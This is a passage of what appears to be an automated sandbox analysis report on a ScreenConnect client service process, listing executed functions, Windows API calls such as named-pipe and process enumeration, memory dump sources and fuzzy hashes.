Opcode Fuzzy Hash: da48c7eabb3875501697df9f8ba298aff4629f38b2bb69998d22956e31e9809f
Instruction Fuzzy Hash: 26D01771A0120CEF9B00EFB8E91169DB7F9EB84205BA045A9E509E7214EA716F009B90

Analysis Process: ScreenConnect.ClientService.exePID: 7544, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	294
Total number of Limit Nodes:	20

Executed Functions

Function 04FDD498 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04FDD534

Strings

4L^q, xrefs: 04FDD4E2

Memory Dump Source

Source File: 0000000B.00000002.2946932055.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4fd0000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID: 4L^q
API String ID: 2489174969-616035646
Opcode ID: 4b87795882e321e2c9ca326babd565d93a063264a2709deb3f558d0384079ce2
Instruction ID: 13397a42c19c037ef413e7b96fc211605cd74bc6d5d44f1c8d8d6ee01bafdb16
Opcode Fuzzy Hash: 4b87795882e321e2c9ca326babd565d93a063264a2709deb3f558d0384079ce2
Instruction Fuzzy Hash: A63103B58003489FCB11CF9AD888A8EBFF6BF48314F14C059E918AB221D375A955CF61

Function 04FDD36C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04FDD534

Strings

d/dq, xrefs: 04FDD3BD
4L^q, xrefs: 04FDD4E2

Memory Dump Source

Source File: 0000000B.00000002.2946932055.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4fd0000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID: 4L^q$d/dq
API String ID: 2489174969-3455392024
Opcode ID: bfdf07f892fd97e655cca4416b7873bd45d93db6c890b0015e0b6bc591b2bda2
Instruction ID: ef0bbc09520181a82102de36563a68e3bb3fcc95270e4d68911274e67c491482
Opcode Fuzzy Hash: bfdf07f892fd97e655cca4416b7873bd45d93db6c890b0015e0b6bc591b2bda2
Instruction Fuzzy Hash: 9561B171A003089FDB15DFA9D844B9EBBF6FF89310F14806AE508EB391D775A906CB61

Function 05830595 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 058306BD

Strings

4L^q, xrefs: 05830669

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID: 4L^q
API String ID: 823142352-616035646
Opcode ID: 7167c015986f78127c8dbff2ce7e2b44dce75c3ea924d33ff09d32b527545cc0
Instruction ID: fb709af855eab87f40481ac95b176bf38d8cdcc9c69049789d59a0ff35c20272
Opcode Fuzzy Hash: 7167c015986f78127c8dbff2ce7e2b44dce75c3ea924d33ff09d32b527545cc0
Instruction Fuzzy Hash: 9A5104B1D00349DFDB14CFA9C889B9EBBF2BB48304F248129E819EB255D7759845CF91

Function 058305A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 058306BD

Strings

4L^q, xrefs: 05830669

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID: 4L^q
API String ID: 823142352-616035646
Opcode ID: be8bdf6295bd807e8eee3f44126358dd8a5949527be37b039168e6c481c29ff2
Instruction ID: 05e102e85674c513639355b8e1d8d9ee633d62bedac5c44b191efa2995940373
Opcode Fuzzy Hash: be8bdf6295bd807e8eee3f44126358dd8a5949527be37b039168e6c481c29ff2
Instruction Fuzzy Hash: 7F4114B1D00349DFDB14CFA9C889B9EBBF2BB48304F248129E819EB295D7759845CF91

Function 01F6C6FF Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 01F6C84D
$^q, xrefs: 01F6C841

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 75e3963466e88f32bc33ac519ab415dce9030341da2b1fa4696e8e8e4360c467
Instruction ID: b397f9860e1b14250a4929f066eb0f467b60e3ad1fe7eb8a70afb3fb4a87c1ea
Opcode Fuzzy Hash: 75e3963466e88f32bc33ac519ab415dce9030341da2b1fa4696e8e8e4360c467
Instruction Fuzzy Hash: 47A16030E00709DFDB14EFA8C454AADBBB2FF88300F108559D49AAB365DB759D85CB81

Function 01F6EF78 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 01F6F1C8
(&^q, xrefs: 01F6F0A9

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: 48b1b1dce92f92eb57dc938f4f4ee05506c471e6b1921e90706ac3b0c96f78b6
Instruction ID: 2990a6c28bd36ad3712cee38096512786ec9e1ded1211da4789487af3ba3451c
Opcode Fuzzy Hash: 48b1b1dce92f92eb57dc938f4f4ee05506c471e6b1921e90706ac3b0c96f78b6
Instruction Fuzzy Hash: A561C231F002199BDB14EFB8D4A06EE7AB6BFD9740F148529D406BB380DE35AD46CB91

Function 01F65DC0 Relevance: 2.6, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`qq, xrefs: 01F65DCC
nCvq, xrefs: 01F65ED1

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: `qq$nCvq
API String ID: 0-1861623134
Opcode ID: 7ba8e07b992dcebf788ba820bcd7f273a4fd9a420c80378dffd386c3467a5672
Instruction ID: b9d7b53d13f3f00bace4b9c5d95cdaee5ea834d987a1e5e4ee258a1931f12cf0
Opcode Fuzzy Hash: 7ba8e07b992dcebf788ba820bcd7f273a4fd9a420c80378dffd386c3467a5672
Instruction Fuzzy Hash: 35418C70B00202CFDB15EB79C89466E77E6FF88245B148868E506EB365EF31EC42CB91

Function 01F64C6C Relevance: 2.6, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Q^q, xrefs: 01F64DEB
`Q^q, xrefs: 01F64C86

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: `Q^q$`Q^q
API String ID: 0-4048626156
Opcode ID: 59088a60b63a76bd77c3c58e1b6da684bdb8325877ef29bf521b1946c26ce871
Instruction ID: 8c972e8e3fa1ffa094f9ff4fa717fa277380e400ad07a006146c9da813558637
Opcode Fuzzy Hash: 59088a60b63a76bd77c3c58e1b6da684bdb8325877ef29bf521b1946c26ce871
Instruction Fuzzy Hash: 40418E71E002199FDB61AF68C8187AEBBB9FB44310F1044E9D50DA7280DB755A49CFA2

Function 01F65410 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 01F65425
$^q, xrefs: 01F65431

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6edb481c493a374f7cbe451d135aeab4e0e455239c4ff14c0b56cdf6f5b55768
Instruction ID: 9453cca06d34c8733b7966f03e940d419916876851607fccbe45f3e4234fa0b9
Opcode Fuzzy Hash: 6edb481c493a374f7cbe451d135aeab4e0e455239c4ff14c0b56cdf6f5b55768
Instruction Fuzzy Hash: 88D05E30B0060CCF972CDE6AD554A1133E87B48A4236104E9D5098F236CF32EC42C651

Function 06393768 Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc6fab539181e19251c6bd043b44d36364ee1003075f424e9457ad03aab5420
Instruction ID: 3821892a3d8f777eb7c39bb7519279bce4e7dd09c448985a1fac83cb50372c71
Opcode Fuzzy Hash: 5cc6fab539181e19251c6bd043b44d36364ee1003075f424e9457ad03aab5420
Instruction Fuzzy Hash: C65170B1A007098FDB24DF69D88469EBBF5FF88310F10892DD469D7641D734E945CBA1

Function 05830007 Relevance: 1.6, APIs: 1, Instructions: 83pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32(00000000), ref: 058300B8

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: 24ec45b5628b940111ffaab6d08ca858021d638d768f8e8b00aaf1533106a786
Instruction ID: 21a1c59d2b29fab89b64836a2ff468097a7e76983c82555b5487ed53af15f2ef
Opcode Fuzzy Hash: 24ec45b5628b940111ffaab6d08ca858021d638d768f8e8b00aaf1533106a786
Instruction Fuzzy Hash: 1A3137B5D053888FCB15CFA9C995B9DBFF1AF09300F14809AD849EB352D6749845CFA1

Function 06393970 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE

Memory Dump Source

Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: bd182d3b829278e1633ea8aa665bc1f3205f1e24fca1956ca1fa5d33a1e0b81b
Instruction ID: 51608d536c7c96972a45c25818228bf0513940da4c916d70d0dbdcbc9e87741f
Opcode Fuzzy Hash: bd182d3b829278e1633ea8aa665bc1f3205f1e24fca1956ca1fa5d33a1e0b81b
Instruction Fuzzy Hash: 722145B58003499FCB10CFAAC845ADEBBF4FF48320F14855AD469B7241C739A945CFA6

Function 0639295C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0639391D

Memory Dump Source

Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 959ec2cfd8e3bb128ccd753908370becdb04b2c8f04db44414c134d666793341
Instruction ID: 2349ceee94639a195a6e06255df7859e0ddfc83a866e583d699d0c68e34101cf
Opcode Fuzzy Hash: 959ec2cfd8e3bb128ccd753908370becdb04b2c8f04db44414c134d666793341
Instruction Fuzzy Hash: A12114B5D002099FEB14CF9AC885B9EBBF5FB48320F50842EE519A7240C738A945CFA5

Function 05830040 Relevance: 1.6, APIs: 1, Instructions: 65pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32(00000000), ref: 058300B8

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: ef7d05d0bdc2c9c7e3f007c94cfd7c8bcd4a4ef58e5c91f0d7d78d9a8af7c4ac
Instruction ID: 5ba6983d21427163f73a4725e7811755e1ab45fa5299e228393096abb6054e56
Opcode Fuzzy Hash: ef7d05d0bdc2c9c7e3f007c94cfd7c8bcd4a4ef58e5c91f0d7d78d9a8af7c4ac
Instruction Fuzzy Hash: 9D2104B0D00258DFCB24DF9AC499B9EBBF5BF48300F148059E819A7340DB749945CFA5

Function 01F6FB40 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

d, xrefs: 01F6FB83

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5d61ed0f8e8695795d2d8861a3b526321228a02d2dc347e9d2d8736ecd032545
Instruction ID: 3387ad37ded5be0319442c2e2768a4d76d20f5063e7881a72b4c65382e30ca2f
Opcode Fuzzy Hash: 5d61ed0f8e8695795d2d8861a3b526321228a02d2dc347e9d2d8736ecd032545
Instruction Fuzzy Hash: 7FD15A74A00615CFCB04DF68D894A99BBB6FF9D304B108659E909AB365DB31FC86CF90

Function 05830420 Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON

Download Yara Rule

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 0583048F

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID:
API String ID: 3146367894-0
Opcode ID: a09c0a7a8ce2ca21e0bd337c123c2469055f513e5235b1f33cf73d343b066eb4
Instruction ID: a92a290e76f3e1eb13b6ee514790649df5725b40c3f4e97250b7fb69c2ec2feb
Opcode Fuzzy Hash: a09c0a7a8ce2ca21e0bd337c123c2469055f513e5235b1f33cf73d343b066eb4
Instruction Fuzzy Hash: 8A21E5B68003098FCB14CF9AC445BDEBBF5FB88324F14842DD969A7241C779AA45CFA5

Function 06393998 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE

Memory Dump Source

Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 37270c6bc702650c496712a02781062c17415c73aa39f886c64228c82278738f
Instruction ID: 876a8831d0f334e2594e34753391eccfe39ee6c48234e3d1600d8a0044dd3426
Opcode Fuzzy Hash: 37270c6bc702650c496712a02781062c17415c73aa39f886c64228c82278738f
Instruction Fuzzy Hash: 8911FFB58006499FCB20DF9AC845ADEBBF4FB48320F14842AD469A3241D779A545CFA6

Function 05830428 Relevance: 1.6, APIs: 1, Instructions: 56pipeCOMMON

Download Yara Rule

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 0583048F

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID:
API String ID: 3146367894-0
Opcode ID: d3681e7f3b82ec92f2b3dfb0fc39707d461b07391f2d1ea41c04b8f26fffaf34
Instruction ID: 4a31f90fcc00b8d2ff93b3b4a13aab9c44611923b474fde01a7fa718d6c05cb9
Opcode Fuzzy Hash: d3681e7f3b82ec92f2b3dfb0fc39707d461b07391f2d1ea41c04b8f26fffaf34
Instruction Fuzzy Hash: C42106B68003098FCB14CF9AC449ADEBBF5FB48324F14842DD969A7241C779AA45CFA1

Function 06392950 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063939FE

Memory Dump Source

Source File: 0000000B.00000002.2950186621.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6390000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 5537746c6dc1cdc80bdb08f6acb3b943a782e3aafea13bc4798e681188ba4061
Instruction ID: fa04717b35a48e0d6ece2848996df3783a166faa9abe1d00cda0e82e5baafb7c
Opcode Fuzzy Hash: 5537746c6dc1cdc80bdb08f6acb3b943a782e3aafea13bc4798e681188ba4061
Instruction Fuzzy Hash: 871103B5C002498FDB20DF9AC844BDEBBF4FB48320F108469D559A7241D778A945CFA5

Function 01F68D98 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

(bq, xrefs: 01F68DBA

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: d179ff5bc01e85af3cc51e8d9c7de2c58a9f82e65de1b7d900a30d47e8dc72df
Instruction ID: 4a2df8413bf574801dfd1b12518139d994c2034c0b0bf468f28448286df47f3c
Opcode Fuzzy Hash: d179ff5bc01e85af3cc51e8d9c7de2c58a9f82e65de1b7d900a30d47e8dc72df
Instruction Fuzzy Hash: D7611474B10605DFDB14DFA9D8949AEB7F6FF8D315B108098E506AB365DB31EC029B80

Function 01F6AAA0 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01F6AC2B

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: aaa1db1d482a1cbb17f65564bc697cec1a6fef440086bf3dd379016db16cf22f
Instruction ID: 1fa4c3e28f7af57e618efba8701384029ad6b6e0aa89ef6597b25600962c7f66
Opcode Fuzzy Hash: aaa1db1d482a1cbb17f65564bc697cec1a6fef440086bf3dd379016db16cf22f
Instruction Fuzzy Hash: 2451F430B01211DFDB299B78D45476EBBF6BF84704F18892AE856EB291DB31DC85CB81

Function 01F65DF0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

nCvq, xrefs: 01F65ED1

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: 818f278cb7852afe4b680726ebf66de3ef68a74acfdce48e6afcd0d3e63154d0
Instruction ID: 822d6d397dab8fa411e64eb6c7b785362b4c8bb6db4cc6789fc81cad49d4a3f7
Opcode Fuzzy Hash: 818f278cb7852afe4b680726ebf66de3ef68a74acfdce48e6afcd0d3e63154d0
Instruction Fuzzy Hash: 0A51A170700206CFDB14EB79D85466E77E6FF88255B108468E506EB365EF31ED42CB91

Function 01F65DE0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

nCvq, xrefs: 01F65ED1

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: 9edbbad92405a8a8e80037c728be15d0c1a5a6ebe74ac367d7caed702f94df31
Instruction ID: 95884e8637615197a0f6161166663bedff65a6ecedb78ad0e2ebefa16def55b8
Opcode Fuzzy Hash: 9edbbad92405a8a8e80037c728be15d0c1a5a6ebe74ac367d7caed702f94df31
Instruction Fuzzy Hash: 8751A370B002028FDB14EB79D85469E77E6FF88351B108568E506EB365EF31ED46CB91

Function 01F67E50 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 01F67E71

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: c802fe53ee2d3189348df580809141d2c76bd49d6c037135719f3d4700c17d9b
Instruction ID: c321eeff1e02e9aa185811b1c3991ba05c10df5ee79f2936d296df74dcea48f1
Opcode Fuzzy Hash: c802fe53ee2d3189348df580809141d2c76bd49d6c037135719f3d4700c17d9b
Instruction Fuzzy Hash: C341C031A00216CBCB15EF69D4949ADBBAAFFC4315F14C629E9069B346DB31ED06CF90

Function 01F6AC10 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01F6AC2B

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: da224cc8e2a85e05663066739f560a5f9d20f8786d6984f80c48d9c57d727b3d
Instruction ID: 2bae50d13e38416effc247e4758a23a39fa12f3a66ba81871a39783fe163fcca
Opcode Fuzzy Hash: da224cc8e2a85e05663066739f560a5f9d20f8786d6984f80c48d9c57d727b3d
Instruction Fuzzy Hash: 5D413E30E10615DBDF299F75D868AAEBBB6BF98705F104029E402B7294DF759941CF80

Function 01F66FE8 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

(, xrefs: 01F670FE

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: e949f42ed2a6b3c20954c995b2cbd84474d06e077b6e161d9fbc59c921c068a4
Instruction ID: d2b152bd0f5b7ace132f392a5d171f904b23d5d5be78d890bf94de8ec74d2876
Opcode Fuzzy Hash: e949f42ed2a6b3c20954c995b2cbd84474d06e077b6e161d9fbc59c921c068a4
Instruction Fuzzy Hash: FC312575B00211ABC705AB7C989055E7BE6FF883513008928D519DB344EF70AE0A8BE2

Function 01F66FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 01F670FE

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: b4ad7cd0d145e3713e12334b601af4a7d671722df3cd2ba64353d31757cc043b
Instruction ID: c4fda6938dbfe36ce11027350765872a9d667f2fd0d793a36835bc2267b2a40b
Opcode Fuzzy Hash: b4ad7cd0d145e3713e12334b601af4a7d671722df3cd2ba64353d31757cc043b
Instruction Fuzzy Hash: C131D475B006119B8705AB7DD89055E77E6FFC83513008928E919EB344EF70FD498BE2

Function 01F6E4F9 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01F6E534

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 542f6c5329112eaf68fbcf831b20310d78b378f964b49c7d7593d39fb4a3c476
Instruction ID: 85162e5a0122f2c8e00b2773dca11a65803b95f2f53248ec167e996d2df50492
Opcode Fuzzy Hash: 542f6c5329112eaf68fbcf831b20310d78b378f964b49c7d7593d39fb4a3c476
Instruction Fuzzy Hash: 5421B536B01204ABDB18DE79C859BAEBB7ABBC8700F14442CE401E7281FE719C41CB69

Function 05830149 Relevance: 1.3, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 058301A5

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7ea5b3cbd616b35579aee483e3eb49d6446fba7638c205db8dab6f3336c72a82
Instruction ID: fcde2e3694bd3f12389cc6bb3882d041056aeb458af09eb4ff9ed83dd204e048
Opcode Fuzzy Hash: 7ea5b3cbd616b35579aee483e3eb49d6446fba7638c205db8dab6f3336c72a82
Instruction Fuzzy Hash: 5D1155B5800349CFCB20DF99C889BDEBBF4EB48324F208419D928A3340D338A945CFA5

Function 05830150 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 058301A5

Memory Dump Source

Source File: 0000000B.00000002.2947811140.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5830000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f96f77412a1f20d8cf6e6b0aafdfeb928019e3bcd97ba64844c7ca4561063101
Instruction ID: d43272a9a139fd9a306f8699f7aa673d339f57c59379dd9c94fc9110cfa7b06b
Opcode Fuzzy Hash: f96f77412a1f20d8cf6e6b0aafdfeb928019e3bcd97ba64844c7ca4561063101
Instruction Fuzzy Hash: 6F1136B5800349CFCB20DF99C849BDEBBF4EB48324F208459D569A7341D739A945CFA5

Function 01F65400 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

$^q, xrefs: 01F65425

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: eec312f3747f4b8c70bc6818f4a7f6e4da737055e5abe7ce18ea85e4a5332af5
Instruction ID: a33c6d01812e4d70cf9b903e17821fe224d39854db7cbd13e29fc66471517920
Opcode Fuzzy Hash: eec312f3747f4b8c70bc6818f4a7f6e4da737055e5abe7ce18ea85e4a5332af5
Instruction Fuzzy Hash: 0FE08630A46700CFD725CF28D6515123BF8AF1595134545EFD949CB672C736D802C621

Function 01F6D078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed5a8d4eeab964a77d8d6faea1aca86377199b5f1e7b5df09a89c2db4a0166b
Instruction ID: 6c204a3beb67c9d52013d9eb0baab45c8af3110fe3e1140e826b6f4a53dc933e
